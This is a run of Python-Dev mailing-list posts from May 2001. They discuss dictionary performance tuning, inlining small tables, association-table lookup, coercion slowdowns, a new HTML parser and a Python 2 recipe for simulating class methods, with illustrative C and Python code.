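A sketch of what such tunables might look like. The macro names below are hypothetical, not ones dictobject.c defines, and a build could override them with -D flags. A single `>=` test written as a NUM/DEN ratio reproduces the current 2/3 rule exactly, but set to 3/4 it is slightly stricter than Tim's `>` variant, since it also resizes a table that is exactly 3/4 full.

```c
#include <assert.h>

/* Hypothetical tuning knobs; override with e.g. -DDICT_MINSIZE=4. */
#ifndef DICT_MINSIZE
#define DICT_MINSIZE 8      /* slots in the first non-empty table */
#endif
#ifndef DICT_LOAD_NUM
#define DICT_LOAD_NUM 2     /* maximum load factor is NUM/DEN */
#endif
#ifndef DICT_LOAD_DEN
#define DICT_LOAD_DEN 3
#endif

/* Nonzero if a table of `size` slots is too full to hold `fill`. */
#define DICT_NEEDS_RESIZE(fill, size) \
    ((fill) * DICT_LOAD_DEN >= (size) * DICT_LOAD_NUM)

/* Table size for `fill`: DICT_MINSIZE, doubled as often as needed. */
static long dict_size_for(long fill)
{
    long size = DICT_MINSIZE;

    assert(fill >= 0);
    while (DICT_NEEDS_RESIZE(fill, size))
        size <<= 1;
    return size;
}
```

With the defaults shown, fills up to 5 fit in 8 slots, fills 6 through 10 need 16, and a fill of 11 needs 32.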

-- 
Marc-Andre Lemburg


From guido at digicool.com  Fri May 18 17:05:45 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 10:05:45 -0500
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400."
             <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> 
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> 
Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>

> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

(I guess he means the buffer is alloc'ed contiguously with the dict
object head.  That's often a nice strategy.  Could do that for small
lists too maybe, except those haven't gotten anybody's attention just
yet.)
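One way to get that contiguous layout, sketched with hypothetical names (`small_dict`, `SMALL_SLOTS`): embed a fixed-size slot array in the object struct and keep a table pointer that starts out aimed at it, moving to a separate heap block only when the table outgrows it. Small tables then cost one allocation instead of two.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define SMALL_SLOTS 8                   /* hypothetical inline capacity */

typedef struct {
    void *key;
    void *value;
} entry;

typedef struct {
    long size;                          /* slots currently in `table` */
    entry *table;                       /* smalltable, or a heap block */
    entry smalltable[SMALL_SLOTS];      /* lives inside the object itself */
} small_dict;

static void small_dict_init(small_dict *d)
{
    memset(d->smalltable, 0, sizeof d->smalltable);
    d->size = SMALL_SLOTS;
    d->table = d->smalltable;           /* no second malloc needed */
}

/* Move to a heap table of `newsize` slots.  A real hash table would
 * re-insert every entry here; this sketch only copies them to show
 * the ownership switch.  Returns 0 on success, -1 if out of memory. */
static int small_dict_grow(small_dict *d, long newsize)
{
    entry *newtable;

    assert(newsize > d->size);
    newtable = calloc((size_t)newsize, sizeof(entry));
    if (newtable == NULL)
        return -1;
    memcpy(newtable, d->table, (size_t)d->size * sizeof(entry));
    if (d->table != d->smalltable)
        free(d->table);                 /* never free the inline buffer */
    d->table = newtable;
    d->size = newsize;
    return 0;
}

/* Release any heap table and fall back to the inline buffer. */
static void small_dict_clear(small_dict *d)
{
    if (d->table != d->smalltable)
        free(d->table);
    small_dict_init(d);
}
```

Because `table` may point into the struct itself, such an object must not be copied by value; every release path has to check whether the table is the inline one before calling free().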

> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the best performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

Yeah, this one sounds like a nice improvement.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas at xs4all.net  Fri May 18 17:00:21 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:00:21 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
Message-ID: <20010518170021.B16811@xs4all.nl>

On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote:

> (I guess he means the buffer is alloc'ed contiguously with the dict
> object head.  That's often a nice strategy.  Could do that for small
> lists too maybe, except those haven't gotten anybody's attention just
> yet.)

Sounds to me like it would benefit tuples even more than lists or dicts. At
least in my code, I see more short tuples than short lists, and they are
usually not altered after creation ;-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From fdrake at acm.org  Fri May 18 17:12:34 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 18 May 2001 11:12:34 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518170021.B16811@xs4all.nl>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
	<200105181505.KAA16890@cj20424-a.reston1.va.home.com>
	<20010518170021.B16811@xs4all.nl>
Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com>

Thomas Wouters writes:
 > Sounds to me like it would benefit tuples even more than lists or dicts. At
 > least in my code, I see more short tuples than short lists, and they are
 > usually not altered after creation ;-)

  The slots of tuples are already allocated inline, so I don't think
they'll get much better.  ;-)


-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido at digicool.com  Fri May 18 17:27:39 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:27:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200."
             <20010518170021.B16811@xs4all.nl> 
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>  
            <20010518170021.B16811@xs4all.nl> 
Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>

> > (I guess he means the buffer is alloc'ed contiguously with the dict
> > object head.  That's often a nice strategy.  Could do that for small
> > lists too maybe, except those haven't gotten anybody's attention just
> > yet.)
> 
> Sounds to me like it would benefit tuples even more than lists or dicts. At
> least in my code, I see more short tuples than short lists, and they are
> usually not altered after creation ;-)

Which is why tuples already have this feature.

Posted before your first cup of coffee? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Fri May 18 17:36:39 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 18 May 2001 17:36:39 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid>

guido wrote:
> A much improved HTML parser -- a replacement for sgmllib.  The API is
> derived from but not quite compatible with that of sgmllib, so it's a
> new file.  I suppose it needs documentation, and htmllib needs to be
> changed to use this instead of sgmllib, and sgmllib needs to be
> declared obsolete.

any reason this cannot be made compatible with sgmllib?

Cheers /F


From thomas at xs4all.net  Fri May 18 17:36:42 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:36:42 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com>
Message-ID: <20010518173642.S16791@xs4all.nl>

On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote:
> > > (I guess he means the buffer is alloc'ed contiguously with the dict
> > > object head.  That's often a nice strategy.  Could do that for small
> > > lists too maybe, except those haven't gotten anybody's attention just
> > > yet.)
> > 
> > Sounds to me like it would benefit tuples even more than lists or dicts. At
> > least in my code, I see more short tuples than short lists, and they are
> > usually not altered after creation ;-)
> 
> Which is why tuples already have this feature.
> 
> Posted before your first cup of coffee? :-)

No, after my last meeting, before my first witbier of the
friday-afternoon-office-beer-binge :) TGIF ;)

-- 
Thomas Wouters <thomas at xs4all.net>


From guido at digicool.com  Fri May 18 17:49:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:49:25 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200."
             <004401c0dfb0$57b7df00$e46940d5@hagrid> 
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>  
            <004401c0dfb0$57b7df00$e46940d5@hagrid> 
Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com>

> guido wrote:
> > A much improved HTML parser -- a replacement for sgmllib.  The API is
> > derived from but not quite compatible with that of sgmllib, so it's a
> > new file.  I suppose it needs documentation, and htmllib needs to be
> > changed to use this instead of sgmllib, and sgmllib needs to be
> > declared obsolete.
> 
> any reason this cannot be made compatible with sgmllib?

The sgmllib API design has a few real bogosities.  I can't recall what
they were, but we looked into keeping it compatible, and it wasn't
worth the pain.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Fri May 18 18:57:34 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 12:57:34 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200."
             <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>  
            <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> 
Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com>

> According to the CVS log, this implementation of do_cmp was installed
> in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
> rationale for doing do_cmp in that order?

You can ask me directly, loewis. :-)

I believe that my thinking at the time was that tp_compare should only
be used as a final fallback, just before comparing by address.  This
was consistent with my desire to completely get rid of tp_compare.

But until that is done, I now agree that it makes more sense to try
tp_compare first when a three-way-compare is requested -- especially
in the light of sequence comparison.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Fri May 18 19:37:33 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 10:37:33 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <20010518103733.A22185@glacier.fnational.com>

M.-A. Lemburg wrote:
> FYI, I have a patch which inlines small dictionaries directly
> into the type object (rather than using malloc to allocate
> the slot buffer).

Would it be faster to inline an association table rather than a
hash table?

 Neil


From guido at digicool.com  Fri May 18 19:43:45 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 13:43:45 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT."
             <20010518103733.A22185@glacier.fnational.com> 
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>  
            <20010518103733.A22185@glacier.fnational.com> 
Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>

> Would it be faster to inline an association table rather than a
> hash table?

What's an association table?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Fri May 18 20:15:59 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 11:15:59 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>
Message-ID: <20010518111559.A22344@glacier.fnational.com>

Guido van Rossum wrote:
> What's an association table?

A table of keys and values.  Values are looked up by looping over
the table comparing each key until the correct one is found (ie.
it's O(n) where n is the size of the table).  For Python, the cost
of doing compares probably outweighs the cost of doing the
hashing, even for small tables.

It's not clear to me though if it would be a win.  Assuming that
interned strings are the most common key, an association table with
four entries would take on average two pointer compares to look
up a value.
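A minimal sketch of Neil's association table, assuming string keys that are usually interned, so that equal keys are normally the same pointer. The names are hypothetical. The first pass does only pointer compares, which is all an interned key needs; the second pass falls back to full string compares for keys that were not interned. Either way the lookup is linear in the number of entries.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef struct {
    const char *key;    /* ideally interned: one pointer per distinct string */
    void *value;
} assoc_entry;

/* O(n) lookup in an unordered table of `n` key/value pairs.
 * Returns the value stored for `key`, or NULL if it is absent. */
static void *assoc_lookup(const assoc_entry *table, size_t n, const char *key)
{
    size_t i;

    assert(table != NULL || n == 0);
    /* Fast pass: identity compares only. */
    for (i = 0; i < n; i++)
        if (table[i].key == key)
            return table[i].value;
    /* Slow pass: compare contents for keys that were not interned. */
    for (i = 0; i < n; i++)
        if (strcmp(table[i].key, key) == 0)
            return table[i].value;
    return NULL;
}
```

The design bet is the one Neil states: if nearly all keys are interned, the slow pass almost never runs and a present key costs between one and n pointer compares, with no hashing at all.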

  Neil


From mal at lemburg.com  Fri May 18 20:15:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 20:15:37 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B0566C9.90F17DB1@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

There you go:

https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470
 
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 18 20:23:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 14:23:55 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT."
             <20010518111559.A22344@glacier.fnational.com> 
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>  
            <20010518111559.A22344@glacier.fnational.com> 
Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > What's an association table?
> 
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (i.e.,
> it's O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.
> 
> It's not clear to me though if it would be a win.  Assuming that
> interned strings are the most common key, an association table with
> four entries would take on average two pointer compares to look
> up a value.
> 
>   Neil

I see.  At the cost of yet another algorithm, of course.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From James_Althoff at i2.com  Fri May 18 21:10:11 2001
From: James_Althoff at i2.com (James_Althoff at i2.com)
Date: Fri, 18 May 2001 12:10:11 -0700
Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods)
Message-ID: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>

Python-dev'ers,

Pardon the intrusion, but Aahz Maruch suggested that I post this to the
python-dev list.  The message below illustrates "yet another class method
recipe" that Costas synthesized (and which I then modified very slightly)
from various posts following another discussion on python-list about class
methods (as we all await the "type/class healing" stuff some of you are
working on -- go team!).  This variant uses explicit "metaclasses" (defined
as regular classes) whose instances ("meta objects") point to class objects
(since they cannot *be* class objects in current Python).   Anyway, I think
the approach has some nice properties.

Best regards,

Jim


----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM -----

From: James Althoff
Date: 05/14/01 02:09 PM
To: python-list at python.org
Subject: Re: Simulating Class (was Re: Does Python have Class methods)

Costas writes:
>Ok, so after looking thru how Python works and comments from people, I
>came up with what I believe may be the best way to implement Class
>methods and Class variables.
>
><snip>
>
>Costas

I think this idea is quite good.  I would amend it very slightly by
suggesting the convention of defining *three* separate names in the
enclosing module:

1) the name of the enclosing class
2) the name of the singleton instance of the enclosing class
3) the name of the enclosed class

To support this, I would propose using a naming convention as below.

If one is interested in defining a class Spam, then use the following
names:

1) SpamMetaClass  -- names the enclosing class
2) SpamMeta  --  names a singleton instance of the enclosing class
3) Spam  --  names the enclosed class

Use the name SpamMetaClass when you need to derive a subclass of
SpamMetaClass, e.g.,

class SpecialSpamMetaClass(SpamMetaClass): pass

Use the name SpamMeta to invoke a class method, e.g.,

SpamMeta.aClassMethod()

Use the name Spam to make instances as usual, e.g.,

s = Spam()

(and to derive a subclass of Spam).
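Here is a compact sketch of the three-name convention. It is written for Python 3 (print function) rather than the Python 2 of the original post. The `whoami`, `new`, and `special` names are illustrative assumptions; the point is only which name is used for what.

```python
class SpamMetaClass:
    """Enclosing class: its methods serve as "class methods" of Spam."""

    class Spam:
        """Enclosed class: ordinary Spam instances come from here."""

        def whoami(self):
            return "Spam instance"

    def whoami(self):
        return "SpamMetaClass instance"

    def new(self):
        # Factory method: self.Spam finds the enclosed class via the instance.
        return self.Spam()


SpamMeta = SpamMetaClass()  # the singleton "meta object"
Spam = SpamMeta.Spam        # module-level name for the enclosed class


class SpecialSpamMetaClass(SpamMetaClass):
    def new(self):
        # Override the factory method but reuse the inherited behaviour.
        s = SpamMetaClass.new(self)
        s.special = True
        return s


s = Spam()                                    # make instances as usual
print(SpamMeta.whoami())                      # SpamMetaClass instance
print(SpecialSpamMetaClass().new().special)   # True
```

Because the meta object is an ordinary instance, the derived meta class inherits `whoami` unchanged while overriding `new`.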

Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby
-- that is to say, the class Spam is not an instance of SpamMetaClass --
nonetheless, SpamMetaClass still acts as a "higher level" class that
provides methods on behalf of the class Spam where said methods are 1)
independent of any particular instance of Spam and 2) allow for
factory-method-style creation of Spam instances -- these being two very
important attributes of the metaclass concept.  Plus "meta" is a nice,
short name.  :-)   Plus using "MetaClass" to refer to the class and "Meta"
to refer to the singleton instance of "MetaClass" is reasonably clear and
succinct, I think.

One nice thing about the proposed recipe is that the SpamMeta object is a
real class instance of a real class.  This means that -- unlike when using
the "module function" recipe -- we get inheritance of methods, and --
unlike when using the "callable wrapper class" recipe -- we also get
override of methods.

The example below illustrates both of these important capabilities.


class Class1MetaClass:  # Base metaclass

    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    def new(self):  # Factory method
        """Return a new instance"""
        return self.Class1()

    def newList(self,n=3):  # Another factory method
        """Return a list of new instances"""
        l = []
        for i in range(n):
            newInstance = self.new()
            l.append(newInstance)
        return l

    # Define Class1 & its "instance methods"

    class Class1:  # Base class

        def whoami(self):
            print 'Class1.whoami:', self


Class1Meta = Class1MetaClass()  # Make & name the singleton metaclass instance
Class1 = Class1Meta.Class1  # Make the Class1 name accessible


class Class2MetaClass(Class1MetaClass):  # Derived metaclass

    # Define "class methods" for Class2 -- Override Class1 "class methods"

    def whoami(self):
        print 'Class2MetaClass.whoami:', self

    def new(self):  # Override the factory method
        return self.Class2()

    # Define Class2 & its "instance methods"

    class Class2(Class1):  # Derived class

        def whoami(self):
            print 'Class2.whoami:', self

Class2Meta = Class2MetaClass()  # Make & name the singleton metaclass instance
Class2 = Class2Meta.Class2  # Make the Class2 name accessible


# Test

Class1Meta.whoami()  # invoke "class method" of base class
Class2Meta.whoami()  # invoke "class method" of derived class

Class1().whoami()  # make an instance & invoke "instance method"
Class2().whoami()

print Class1Meta.newList()  # factory method
print Class2Meta.newList()  # inherit factory method with override

>>> reload(meta6)
Class1MetaClass.whoami: <meta6.Class1MetaClass instance at 00810DBC>
Class2MetaClass.whoami: <meta6.Class2MetaClass instance at 00812D6C>
Class1.whoami: <meta6.Class1 instance at 0081058C>
Class2.whoami: <meta6.Class2 instance at 0081058C>
[<meta6.Class1 instance at 0081147C>, <meta6.Class1 instance at 0081151C>, <meta6.Class1 instance at 0081009C>]
[<meta6.Class2 instance at 0081147C>, <meta6.Class2 instance at 00810CCC>, <meta6.Class2 instance at 0081009C>]
<module 'meta6' from 'c:\_dev\python20\meta6.py'>


Jim


From tim.one at home.com  Fri May 18 21:26:02 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 18 May 2001 15:26:02 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B0509BF.A2F84A30@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBGKDAA.tim.one@home.com>

[MAL]
> It [pybench] doesn't claim "typical use". pybench is aimed at finding
> out performance issues about hot-spots -- there's no such thing as
> a "typical program", so pybench gives you low level performance
> compares for very specific tasks, e.g. dictionary creation or
> for-loop performance.
>
> I have found it to be rather successful at that. At least gives
> some good hints at where to look...

There must be a misunderstanding here.  I understand and appreciate all that!

From tim.one at home.com  Fri May 18 21:48:33 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 18 May 2001 15:48:33 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518111559.A22344@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKDAA.tim.one@home.com>

[Neil Schemenauer]
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (i.e.,
> it's O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.

I thought about that before.  The inlining appeals but the algorithm not
much:  the dict implementation *as is* loops over all the table entries too,
except that instead of starting with "i = 0" it starts (now) with "i = hash &
mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^=
poly"; and instead of giving up when "i >= length" it punts when finding an
entry with a null value.  Incrementing via ++i is certainly cheaper, except
that even when small, the hash table usually hits on the first try when the
key is present, so usually gets out before incrementing.
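This Python sketch makes the increment step concrete. It models only the shift-and-xor update as stated above, not the rest of the dict lookup loop. It assumes an 8-slot table, so mask = 7, and poly = 0b1011, i.e. the polynomial x^3 + x + 1. That value is an assumption, chosen because the polynomial is primitive over GF(2). Primitivity is what makes the sequence visit every nonzero value in 1..mask before repeating.

```python
def probe_increments(start, mask, poly):
    """Yield the increments produced by the shift-and-xor step.

    Each step doubles the increment; when it exceeds `mask`, xoring with
    `poly` (whose top bit is the bit just above `mask`) folds it back into
    the range 1..mask.  `start` must be nonzero, or the sequence stays at 0.
    """
    incr = start
    while True:
        yield incr
        incr <<= 1
        if incr > mask:
            incr ^= poly


def probe_cycle(start, mask, poly):
    """Collect increments until one repeats."""
    seen = []
    for incr in probe_increments(start, mask, poly):
        if incr in seen:
            return seen
        seen.append(incr)


# Assumed 8-slot table: mask = 7, poly = 0b1011 (x**3 + x + 1).
print(probe_cycle(1, 7, 0b1011))  # [1, 2, 4, 3, 6, 7, 5]
```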

> It's not clear to me though if it would be a win.

Best guess is not.

> Assuming that interned strings are the most common key, an association
> table with four entries would take on average two pointer compares
> to look up a value.

Actually an average of 2.5 when the key is present and each key is equally
likely to be queried, and always 4 when the queried key is not present.  The
hash table has better expected stats on both counts, but needs 4 unused slots
too to achieve that.  The savings would be in memory for small dicts more
than in time (if at all).
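Tim's figures follow from simple arithmetic, assuming n distinct keys, each equally likely to be queried. A hit on the k-th key costs k compares, so the mean is (n + 1) / 2, and a miss costs n. Here is a small Python check; the function name is hypothetical:

```python
from fractions import Fraction


def linear_scan_costs(n):
    """Expected compares for a linear scan over n distinct keys.

    A hit on the k-th key costs k compares; with all keys equally likely
    the mean is (1 + 2 + ... + n) / n = (n + 1) / 2.  A miss costs n.
    """
    hit_mean = Fraction(n * (n + 1) // 2, n)
    miss = n
    return hit_mean, miss


hit, miss = linear_scan_costs(4)
print(float(hit), miss)  # 2.5 4
```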


From jeremy at alum.mit.edu  Fri May 18 23:07:37 2001
From: jeremy at alum.mit.edu (Jeremy Hylton)
Date: Fri, 18 May 2001 17:07:37 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
Message-ID: <200105182107.RAA16214@cliff.concentric.net>

I did some profiles of more of the pybench slowdowns this afternoon
and found a few causes for several problem benchmarks.

I just made a couple of small changes for BuiltinFunctionCalls.  The
problem here is that PyCFunction calls were optimized for flags == 0
and not flags == METH_VARARGS, which is more common.

The scary thing about BuiltinFunctionCalls is that the profiler shows
it spending almost 30% of its time in PyArg_ParseTuple().  It
certainly is a shame that we have this complicated, slow run-time
parsing mechanism to deal with a static property of the code, namely
how many arguments it takes and what their types are.

A few of the other tests, SimpleComplexArithmetic and
CreateStringsWithConcat, are slower because of the new coercion
logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
look at CreateStringsWithConcat in some detail.  The basic problem is
that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
PyNumber_Add("ab", "cd").  This function tries all sorts of different
ways to coerce the strings into addable numbers before giving up and
trying sequence concat.

It looks like the new coercion rules have optimized number ops at the
expense of string ops.  If you're writing programs with lots of
numbers, you probably think that's peachy.  If you're parsing HTML,
perhaps you don't :-).

I looked at the test suite to see how often it is called with
non-number arguments.  The answer is 77% of the time, but almost all
of those calls are from test_unicodedata.  If that one test is
excluded, the majority of the calls (~90%) are with numbers.  But the
majority of those calls just come from a few tests -- test_pow,
test_long, test_mutants, test_strftime.

If I were to do something about the coercions, I would see if there
was a way to quickly determine that PyNumber_Add() ain't gonna have
any luck.  Then we could bail to things like string_concat more
quickly.

I also looked at SmallLists.  It seems that the only significant
change since 1.5.2 is the garbage collection.  This test spends a lot
more time deallocating lists than it used to, and the only change I
see in the code is the GC.  I assume, but haven't checked, that the
story is similar for SmallTuples.

So the primary things that have slowed down since 1.5.2 seem to be:
comparisons, coercion, and memory management for containers.  These
also seem to be the things that have improved the most in terms of
features, completeness, etc.  Looks like we need to revisit them and
sort out the performance issues.

Jeremy


From guido at digicool.com  Fri May 18 23:58:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 17:58:25 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT."
             <200105182107.RAA16214@cliff.concentric.net> 
References: <200105182107.RAA16214@cliff.concentric.net> 
Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>

> The scary thing about BuiltinFunctionCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and what their types are.

I would love to see a mechanism whereby the signature of a C function
could be stored as part of the static info about it, in an extension
of the PyMethodDef structure: this would serve as documentation, allow
for introspection, etc.  I'm sure Ping would love this for pydoc and
his inspect module.

But I'm not sure how much we can speed things up, unless we give up on
the tuple interface (an argc/argv API could be much faster since
usually the arguments are already on the frame's stack in this form).

> A few of the other tests, SimpleComplexArithmetic and
> CreateStringsWithConcat, are slower because of the new coercion
> logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
> look at CreateStringsWithConcat in some detail.  The basic problem is
> that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
> PyNumber_Add("ab", "cd").  This function tries all sorts of different
> ways to coerce the strings into addable numbers before giving up and
> trying sequence concat.
> 
> It looks like the new coercion rules have optimized number ops at the
> expense of string ops.  If you're writing programs with lots of
> numbers, you probably think that's peachy.  If you're parsing HTML,
> perhaps you don't :-).
> 
> I looked at the test suite to see how often it is called with
> non-number arguments.  The answer is 77% of the time, but almost all
> of those calls are from test_unicodedata.  If that one test is
> excluded, the majority of the calls (~90%) are with numbers.  But the
> majority of those calls just come from a few tests -- test_pow,
> test_long, test_mutants, test_strftime.
> 
> If I were to do something about the coercions, I would see if there
> was a way to quickly determine that PyNumber_Add() ain't gonna have
> any luck.  Then we could bail to things like string_concat more
> quickly.

There's already a special case for int+int in the BINARY_ADD opcode
(otherwise you would probably see more numbers).  Maybe another
special case for str+str would help here?
